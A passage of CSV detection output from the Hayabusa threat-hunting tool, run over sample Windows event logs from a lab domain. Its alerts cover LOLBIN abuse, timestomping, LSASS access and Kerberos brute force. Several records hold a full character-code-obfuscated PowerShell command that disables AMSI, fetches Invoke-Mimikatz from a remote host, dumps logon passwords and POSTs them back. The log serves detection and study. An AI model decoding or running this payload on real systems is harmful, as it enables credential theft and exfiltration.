Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 
121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 
61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: FS03VULN$ | LID: 0x3e4",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.651 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 
105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 
112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x90c | User: admmig | LID: 0x8157bac",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:45.843 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x214 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-25 00:48:24.985 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx 2021-11-25 00:48:25.000 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx 2021-11-28 00:47:00.365 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx 2021-11-28 00:47:00.369 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx 
2021-12-01 07:05:47.229 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\287ded39f444f2847a5175b4bf51f9c9\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=4F4193BFF5970968B6EEAD58EB83F9415F32A5C1,MD5=9139657B434F2FA8023775958164DB0C,SHA256=EE9CD13CC38A285D48B00E21CBB11F9CA8C8F435ADF6ADF5281C371DD0A406AA,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=1663A59FF35A01F612C878AB83F2AD242BB46FB6,MD5=FC2036AB90490D8FDFB3B3F3B90AF56F,SHA256=E293B79E4C06E8DEFD95F3CB9B70BA1CC50E83C37930DA802B50066AC6DF0509,IMPHASH=77B4BD4D7F94DBB1235EEE9E8C0737DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 
2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62095 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 2668 | Src PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Tgt PID: 480 | Tgt PGUID: A57649D1-92D8-61A4-7191-000000000000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS 
Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62096 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-02 23:48:15.983 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test1 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: 
-,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:15.983 +09:00,-,-,medium,InitAccess : PrivEsc,Invalid Users Failing To Authenticate From Source Using Kerberos,"[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:46 TargetUserName:test1/rey/b aer/sgfg/g/tbyt/ysy/admtest/wyt/vase/ytuntsr/mgdi/syvsdy/s/vt/test2/ugu/sef/gsdf/yvas/accrt/tc/dyfgdhbn/bsfin/ar/xvtrz/vs/uydzry/vay/yvsyv/tary/go/xt/nini/bdcy/xc/sfs/srey/m,og/vdr/tfay/nd/vga/vrat/rec/ryver IpAddress:::ffff:10.23.123.11 timeframe:24h",rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos3.yml,- 2021-12-02 23:48:16.298 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:16.308 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test2 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:16.311 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admtest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with 
non existing users.evtx 2021-12-02 23:48:16.338 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:16.338 +09:00,-,-,medium,InitAccess : PrivEsc,Disabled Users Failing To Authenticate From Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:16 TargetUserName:SM_2f6964c8f421408ab/SM_374806bcc65140a5a/Administrator/DefaultAccount/krbtgt/Test-ADM/SM_8b9faa99d83446d1b/SM_6aaeeb113c0c4af3a/administrator/SM_25e3b4425ffd47aab/SM_957258b5879242afb/SM_27d255b6407743b08/SM_2b6f1a51ac6c41b2a/Guest/SM_b2a35e76f50a4c23a/$P51000-50I28MP5JB3E IpAddress:::ffff:10.23.123.11 timeframe:24h,rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos2.yml,- 2021-12-02 23:48:16.342 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:16.956 +09:00,-,-,medium,InitAccess : PrivEsc,Valid Users Failing to Authenticate From Single Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:22 
TargetUserName:svc-ata/svc_adfs01/HealthMailbox0ab31b3/HealthMailbox2cfa5bd/HealthMailboxf49e2c8/HealthMailbox9a2d0da/HealthMailboxf7e4358/adminupn42/vuln_scan/HealthMailboxe8b0d98/HealthMailboxdabf0a3/HealthMailboxc9291f7/proabcdef/HealthMailboxa935ecd/HealthMailboxeb3dc3f/HealthMailboxebdc745/domadm/admin-te/HealthMailboxa99e1bd/admin-hacker/svc_nxlog/Svc-SQL-DB01 IpAddress:::ffff:10.23.123.11 timeframe:24h,rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos.yml,- 2021-12-02 23:48:17.267 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sgfg | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.271 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: g | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.274 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dyfgdhbn | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.277 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xvtrz | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: 
